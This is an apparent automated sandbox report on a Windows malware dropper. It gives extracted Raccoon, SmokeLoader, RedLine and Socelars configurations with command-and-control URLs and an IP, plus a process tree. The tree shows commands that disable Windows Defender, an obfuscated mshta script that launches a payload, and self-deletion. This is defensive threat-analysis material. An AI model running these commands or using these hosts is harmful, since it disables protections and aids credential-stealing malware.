Analysis

  • max time kernel
    29s
  • max time network
    171s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    08-11-2021 10:07

General

  • Target

    578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe

  • Size

    4.6MB

  • MD5

    4f85f62146d5148f290ff107d4380941

  • SHA1

    5c513bcc232f36d97c2e893d1c763f3cbbf554ff

  • SHA256

    578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3

  • SHA512

    bc4ae4f7101b20ab649ea2a44d5da42875af5068c33c1772960c342cc8731bddfdabd721fb31a49523ea957615252d567a00346035bddacfa58cf97853587594

Malware Config

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes
  • url4cnc

    http://telegatt.top/oh12manymarty

    http://telegka.top/oh12manymarty

    http://telegin.top/oh12manymarty

    https://t.me/oh12manymarty

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Chris

C2

194.104.136.5:46013

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 29 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
    "C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:304
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:764
      • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
          4⤵
            PID:1084
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1540
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
                PID:1208
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
              4⤵
              • Loads dropped DLL
              PID:1788
              • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19ac3c92c21.exe
                Tue19ac3c92c21.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1944
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
              4⤵
                PID:1448
                • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c9e031f4.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c9e031f4.exe"
                  5⤵
                    PID:1100
                  • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c9e031f4.exe
                    Tue19c9e031f4.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1928
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
                  4⤵
                    PID:920
                    • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe
                      Tue1932df4dae.exe
                      5⤵
                        PID:1172
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
                      4⤵
                      • Loads dropped DLL
                      PID:1936
                      • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                        Tue193e530416b51740a.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1956
                        • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                          C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                          6⤵
                            PID:472
                          • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                            C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                            6⤵
                              PID:2196
                            • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                              C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe
                              6⤵
                                PID:2132
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
                            4⤵
                            • Loads dropped DLL
                            PID:1736
                            • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c28f648204dbd4.exe
                              Tue19c28f648204dbd4.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:816
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
                            4⤵
                              PID:1884
                              • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue197e9ec0ff0.exe
                                Tue197e9ec0ff0.exe
                                5⤵
                                  PID:1648
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
                                4⤵
                                  PID:620
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19d1fc7d2654d7a.exe
                                    Tue19d1fc7d2654d7a.exe
                                    5⤵
                                      PID:616
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
                                    4⤵
                                      PID:1972
                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19b4b38a7569a9.exe
                                        Tue19b4b38a7569a9.exe
                                        5⤵
                                          PID:888
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
                                        4⤵
                                          PID:304
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19f40f8518b9946.exe
                                            Tue19f40f8518b9946.exe
                                            5⤵
                                              PID:340
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 492
                                            4⤵
                                            • Program crash
                                            PID:552
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
                                            4⤵
                                              PID:1096
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
                                              4⤵
                                                PID:1920
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
                                                4⤵
                                                  PID:268
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
                                                  4⤵
                                                    PID:1952
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
                                                    4⤵
                                                      PID:952
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:1728
                                              • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19cef5687a.exe
                                                Tue19cef5687a.exe
                                                1⤵
                                                  PID:684
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )
                                                  1⤵
                                                    PID:2236
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
                                                      2⤵
                                                        PID:2616
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill -iM "Tue1932df4dae.exe" /f
                                                          3⤵
                                                          • Kills process with taskkill
                                                          PID:2796
                                                        • C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
                                                          ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
                                                          3⤵
                                                            PID:2784
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193129b31e741ef3.exe
                                                        Tue193129b31e741ef3.exe
                                                        1⤵
                                                          PID:2076
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            2⤵
                                                              PID:2772
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue192c34b1c2f5.exe
                                                            Tue192c34b1c2f5.exe /mixone
                                                            1⤵
                                                              PID:1476
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue192c34b1c2f5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue192c34b1c2f5.exe" & exit
                                                                2⤵
                                                                  PID:2308
                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1968b7ee9058232e8.exe
                                                                Tue1968b7ee9058232e8.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:940

                                                              Network

                                                              MITRE ATT&CK Enterprise v6

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • memory/304-55-0x0000000075B71000-0x0000000075B73000-memory.dmp

                                                                Filesize

                                                                8KB

                                                              • memory/552-223-0x0000000000770000-0x00000000007F0000-memory.dmp

                                                                Filesize

                                                                512KB

                                                              • memory/684-204-0x0000000000400000-0x00000000016FB000-memory.dmp

                                                                Filesize

                                                                19.0MB

                                                              • memory/684-202-0x00000000002F0000-0x000000000037E000-memory.dmp

                                                                Filesize

                                                                568KB

                                                              • memory/684-192-0x00000000017C0000-0x000000000180F000-memory.dmp

                                                                Filesize

                                                                316KB

                                                              • memory/864-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                              • memory/864-94-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/864-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/864-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/864-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                              • memory/864-93-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/864-87-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/864-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/864-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/864-92-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/864-84-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                              • memory/864-96-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                              • memory/864-95-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/864-97-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                Filesize

                                                                152KB

                                                              • memory/864-98-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                Filesize

                                                                152KB

                                                              • memory/940-208-0x00000000003D0000-0x00000000003D9000-memory.dmp

                                                                Filesize

                                                                36KB

                                                              • memory/940-163-0x00000000030D0000-0x00000000030D9000-memory.dmp

                                                                Filesize

                                                                36KB

                                                              • memory/940-207-0x0000000000400000-0x0000000002F02000-memory.dmp

                                                                Filesize

                                                                43.0MB

                                                              • memory/1384-213-0x0000000002B40000-0x0000000002B56000-memory.dmp

                                                                Filesize

                                                                88KB

                                                              • memory/1448-200-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1476-187-0x0000000000300000-0x0000000000329000-memory.dmp

                                                                Filesize

                                                                164KB

                                                              • memory/1476-211-0x0000000000400000-0x0000000002F22000-memory.dmp

                                                                Filesize

                                                                43.1MB

                                                              • memory/1476-210-0x0000000002FA0000-0x0000000002FE9000-memory.dmp

                                                                Filesize

                                                                292KB

                                                              • memory/1648-227-0x0000000003520000-0x000000000366C000-memory.dmp

                                                                Filesize

                                                                1.3MB

                                                              • memory/1944-224-0x0000000003D90000-0x0000000003EDC000-memory.dmp

                                                                Filesize

                                                                1.3MB

                                                              • memory/1956-206-0x0000000004890000-0x0000000004891000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1956-203-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2196-217-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2196-218-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2196-216-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2196-220-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2196-219-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB